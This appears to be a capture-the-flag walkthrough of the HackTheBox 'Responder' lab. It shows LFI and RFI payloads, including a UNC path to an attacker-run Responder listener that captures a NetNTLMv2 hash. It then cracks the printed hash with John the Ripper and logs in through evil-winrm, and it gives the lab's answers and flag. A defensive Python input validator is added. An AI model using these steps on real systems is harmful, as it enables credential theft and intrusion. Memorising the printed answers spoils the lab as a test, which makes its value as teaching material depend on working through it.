
# Responder


**Task 1**

When visiting the web service using the IP address, what is the domain that we are being redirected to?

**Answer:**

* Open a web browser and enter `http://[IP]`.
* The server redirects you to the hostname "unika.htb".

**Task 2**

Which scripting language is being used on the server to generate webpages?

**Answer:**

* Chances are the redirected URL will not resolve, because "unika.htb" is not in DNS.
* Run the following command to add a hosts entry that maps the target IP to that hostname:

```
echo "[IP] unika.htb" | sudo tee -a /etc/hosts
```

* This makes the website reachable by name.
* After this, click another link on the main page.
* Check the URL and you will notice that index.php is loaded.
* Therefore the scripting language used is "php".

**Task 3**

What is the name of the URL parameter which is used to load different language versions of the webpage?

**Answer:**

* Click the language link in the upper right-hand corner and pick French.
* Now look at the URL and you will notice a parameter named "page" that selects the language file.

**Task 4**

Which of the following values for the `page` parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

**Answer:**

* The answer is "../../../../../../../../windows/system32/drivers/etc/hosts"

**Task 5**

Which of the following values for the `page` parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

**Answer:**

* The answer is "//10.10.14.6/somefile"
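As an added example (not code from the original write-up or from the box), this is how a page loader behind a `page` parameter like unika.htb's can tell the Task 4 and Task 5 values apart and refuse both: classify the raw value by shape, then only serve allowlisted files that normalise to a path under the pages directory. `PAGES_DIR` and `ALLOWED_PAGES` are assumptions for illustration.

```python
import os
from typing import Optional
from urllib.parse import urlsplit

# Added example, not part of the original write-up. PAGES_DIR and
# ALLOWED_PAGES are hypothetical values chosen for illustration.
PAGES_DIR = "/var/www/unika/pages"
ALLOWED_PAGES = {"english.html", "french.html", "german.html"}

def classify(page: str) -> str:
    """Label a raw page value 'rfi', 'lfi' or 'ok' by its shape alone (no disk access)."""
    p = page.replace("\\", "/")                 # PHP on Windows accepts both separators
    if p.startswith("//"):                      # UNC / protocol-relative host: //host/share
        return "rfi"
    if len(p) > 1 and p[1] == ":" and p[0].isalpha():   # drive letter such as C:
        return "lfi"
    if p.startswith("/") or ".." in p.split("/"):       # absolute path or traversal
        return "lfi"
    if urlsplit(p).scheme:                      # http://, ftp:// and other stream wrappers
        return "rfi"
    return "ok"

def resolve_page(page: str) -> Optional[str]:
    """Return the file to include, or None when the value must be rejected."""
    if classify(page) != "ok" or page not in ALLOWED_PAGES:
        return None
    full = os.path.normpath(os.path.join(PAGES_DIR, page))
    # Second line of defence: the normalised path must still sit under PAGES_DIR
    if os.path.commonpath([PAGES_DIR, full]) != PAGES_DIR:
        return None
    return full
```

Note that "minikatz.exe" passes the shape check but is still refused, because the allowlist, not the shape check, is what actually decides what gets included.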

**Task 6**

What does NTLM stand for?

**Answer:**

* New Technology LAN Manager

**Task 7**

Which flag do we use in the Responder utility to specify the network interface?

**Answer:**

* First, run the following to see what options are available with responder:

```
responder -h
```

* Reading through the documentation, the flag is "-I"

**Task 8**

There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as `john`, but the full name is what?

**Answer:**

* The answer is "John the Ripper"

**Task 9**

What is the password for the administrator user?

**Answer:**

* Start by initiating Responder with the command below:

```
sudo responder -I tun0
```

* This starts a Responder listener on the tun0 interface (the HTB VPN interface).
* In the startup output you should find a "Responder IP" value. In my case it was 10.10.14.40, but yours may differ.
* Back in the browser, we want to perform a Remote File Include (RFI) by entering the following:

```
http://unika.htb/?page=//10.10.14.40/somefile
```

* Use the IP that Responder reported to you here, so keep an eye on it.
* Once you hit enter the page will not resolve, but if you go back to the terminal with the Responder listener, you will see that it captured an authentication (a NetNTLMv2 challenge/response).


* Now we need to take that captured authentication and feed it into John the Ripper to see if it can match it to a password for the Administrator account.
* Open a terminal window and run the following to save the hash to a text file:

```
echo "Administrator::RESPONDER:cc89ef09810be846:8DD511C596718C4C136B84A19916E6DD:010100000000000000E2FC902E59D9010AEA90B992FB7CC100000000020008004C005A0044004E0001001E00570049004E002D00480057005100490035003900590036004F003000370004003400570049004E002D00480057005100490035003900590036004F00300037002E004C005A0044004E002E004C004F00430041004C00030014004C005A0044004E002E004C004F00430041004C00050014004C005A0044004E002E004C004F00430041004C000700080000E2FC902E59D90106000400020000000800300030000000000000000100000000200000C203A6B4D9A1F9D91DCAB2EBECB0C7696F75D0CBEC1A085F2584334D5E69FAF90A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00340030000000000000000000" > hash.txt
```

* Next is to run it through John the Ripper with the following:

```
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

* This should return a password of "badminton"

**Task 10**

We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What TCP port does it listen on?

**Answer:**

* Start by making sure evil-winrm is installed:

```
sudo gem install evil-winrm
```

* Then run the following command to connect to the Windows machine:

```
evil-winrm -i [TARGET IP] -u administrator -p badminton
```

* We should now be logged into the Windows account.
* If you open a new terminal tab and run an nmap scan on all ports, you will find that port "5985" is open and running wsman (WinRM). This is the answer.

**Submit Flag:**

* From the previous task we should be logged into the windows system. From here we can list out the directories with the "dir" command.
* I browsed around and found the flag.txt file in C:\Users\mike\Desktop\flag.txt
* Use the "type" command to see the flag.
* The flag is "ea81b7afddd03efaa0945333ed147fac"
